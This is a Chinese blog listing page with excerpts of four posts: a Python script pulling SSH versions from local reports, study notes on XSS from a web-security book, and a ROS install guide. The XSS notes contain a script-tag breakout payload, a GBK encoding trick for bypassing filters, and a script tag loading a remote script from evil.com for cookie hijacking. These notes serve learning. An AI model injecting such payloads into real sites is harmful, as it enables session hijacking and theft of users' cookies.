- 博客(4)
- 收藏
- 关注
原创 python爬虫爬取本地网页信息
最近在移动驻场,有个需求要获取报告中的ssh版本信息就写了个十多行的小脚本。 import sys import os import re from bs4 import BeautifulSoup fp=open('url.txt','r') fk=open('ssh_version.txt','w') lines=fp.readlines() for line in lines: ...
2018-12-13 15:00:31 629
原创 白帽子讲web安全笔记——XSS(二)
XSS构造技巧 利用字符编码 由于采用GBK/GB2312编码 %c1\长两个字符组合在一起会成为一个新的Unicode,会变成一个字符从而绕过系统的安全检查。 绕过长度限制 假设下面的代码存在一个漏洞 <input type=text value="$var" /> 那下面的XSS构造就会失效 "><script>alert(/xss/)<...
2018-09-21 10:53:37 299
原创 白帽子讲web安全笔记——XSS(一)
XSS 跨站脚本攻击 三种类型:1.反射型:简单的把用户输入的数据“反射”给浏览器 2.存储型:把用户输入的数据“存储”在服务器端 具有很强的稳定性 3.DOM Based:修改页面的DOM节点形成的 XSS攻击: Cookie劫持 先加载一个远程脚本 <script src=http://www.evil.com/evil.js></scrip...
2018-09-20 19:44:08 367
原创 ROS平台的安装搭建
ROS系统安装 一、安装准备 1.1 安装环境 Ubuntu16.04 1.2 安装版本 ROS Kinetic Kame 二、安装步骤 2.1 添加源 打开一个终端 $ sudo sh -c 'echo "deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main" > /etc/apt...
2018-07-21 19:58:15 2294
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人